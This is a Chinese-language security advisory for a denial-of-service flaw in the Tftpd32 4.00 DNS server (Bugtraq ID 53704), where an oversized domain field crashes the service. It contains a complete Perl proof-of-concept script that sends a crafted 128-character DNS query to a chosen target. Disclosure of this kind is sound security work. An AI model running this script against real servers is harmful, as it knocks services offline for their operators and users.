tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞

发布日期：2012-05-28

更新日期：2012-05-29

受影响系统：

TFTPD32 TFTPD32 4.00

描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 53704

Tftpd32是Windows平台上的TFTP和DHCP服务器。

TFTPD32 4.00之前版本在实现上存在拒绝服务漏洞，DNS服务器绑定了UDP端口53，但没有验证域选项大小，在发送超过127个字符时，攻击者可利用此漏洞造成服务器崩溃。

测试方法：

--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

demonalex ()提供了如下测试方法：

Proof Of Concept :

-----------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

use Socket;

use Math::BigInt;

$|=1;

$host=shift;

$port=shift || '53';

die "usage: $0 \$host [\$port]\n" if(!defined($host));

$target_ip = inet_aton($host);

$target = sockaddr_in($port, $target_ip);

$crash='A'x128;

$transaction_id_count=1;

sub dns_struct_pack($){

$domain=shift; #domain

$type="\x00\xff"; #dns_type = ANY

$transaction_id_count=1 if($transaction_id_count > 255);

$x=Math::BigInt->new($transaction_id_count);

$x=~s/0x//;

$transaction_id=sprintf("\x00".chr($x));

$flag="\x01\x00";

$question="\x00\x01";

$answer_rrs="\x00\x00";

$authority_rrs="\x00\x00";

$additional_rrs="\x00\x00";

if($domain ne '0'){

undef($domain_length);

$domain_length=length($domain);

$y=Math::BigInt->new($domain_length);

$y=~s/0x//;

$domain_length=chr($y);

}

$class="\x00\x01"; #IN

$transaction_id_count++;

if($domain eq '0'){

$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."\x00"."$type"."$class";

}else{

$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain".

"\x00"."$type"."$class";

}

return $packet_struct;

}

print "Launch attack ... ";

socket(SOCK1, AF_INET, SOCK_DGRAM, 17);

send(SOCK1, &dns_struct_pack($crash), 0, $target);

close(SOCK1);

print "Finish!\n";

exit(0);

-----------------------------------------------------------

建议：

--------------------------------------------------------------------------------

厂商补丁：

TFTPD32

-------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞相关推荐

云计算之路-试用Azure：搭建自己的内网DNS服务器
之前我们写过一篇博文谈到Azure内置的内网DNS服务器不能跨Cloud Service,而我们的虚拟机部署场景恰恰需要跨多个Cloud Service,所以目前只能选择用Azure虚拟机搭建自己的内 ...
这个TsuNAME 新漏洞可对关键 DNS 服务器发动 DDoS 攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士新西兰和荷兰国家域名注册商(.nz 和 .nl)的运营商在 DNS 流量权威服务器中检测到异常情况后,在域名服务器 (DNS) 生态系统中 ...
dns服务器漏洞修复,KB4569509：DNS 服务器漏洞 CVE-2020-1350 指南
简介 2020 年 7 月 14 日,Microsoft 发布了针对 CVE-2020-1350 | Windows DNS 服务器远程代码执行漏洞中描述的问题的安全更新. 此通报描述了影响配置为运行 ...
网络电话显示服务器拒绝,云安全日报201223：思科IP电话发现拒绝服务漏洞,需要尽快升级...
12月22日,思科发布了安全更新,主要修复了IP电话TCP数据包发现的拒绝服务漏洞.以下是漏洞详情: 漏洞详情来源:https://tools.cisco.com/security/center/c ...
网络电话显示服务器拒绝,云安全日报201223：思科IP电话发现拒绝服务漏洞需要尽快升级...
12月22日,发布了安全更新,主要修复了IP电话TCP数据包发现的拒绝服务漏洞.以下是漏洞详情: 漏洞详情来源:https://tools.cisco.com/security/center/con ...
Linux之DNS服务器搭建及常见DNS***和防御
DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串.通过主机名,最终 ...
安全测试（三）服务器安全渗透测试常规服务器安全漏洞高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等浅谈《社会工程学》实战案例
文章目录一.前言二.服务器安全高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号扫描工具介绍 2.4 端口号端口说明攻击技巧 2.5 安全警示 ...
运维之DNS服务器Bind9配置解析和基础示例及附带命令
0x03 Bind 配置解析实例1.DNS主从区域传输介绍与配置实例2.DNS区域传输限制实例3.DNS部分二级域名解析示例1.采用Bind建立一个A记录DNS服务器示例2.采用Bind建立 ...
DNS 区域传送漏洞（dns-zone-tranfer）学习
DNS 区域传送漏洞(dns-zone-tranfer)学习 ---- 相关知识理解 DNS(域名系统)就像一个互联网电话簿.它负责将人类可读的主机名解析为机器可读的 IP 地址. DNS服务器分为主 ...
dns协议类漏洞学习--结合snort分析（二）
cve-2014-8500 漏洞描述: ISC BIND 9.0.x到9.8.x,9.9.0到9.9.6和9.10.0到9.10.1不限制delegation chaining,允许远程攻击者通过大量 ...

tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞

tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞相关推荐

最新文章

热门文章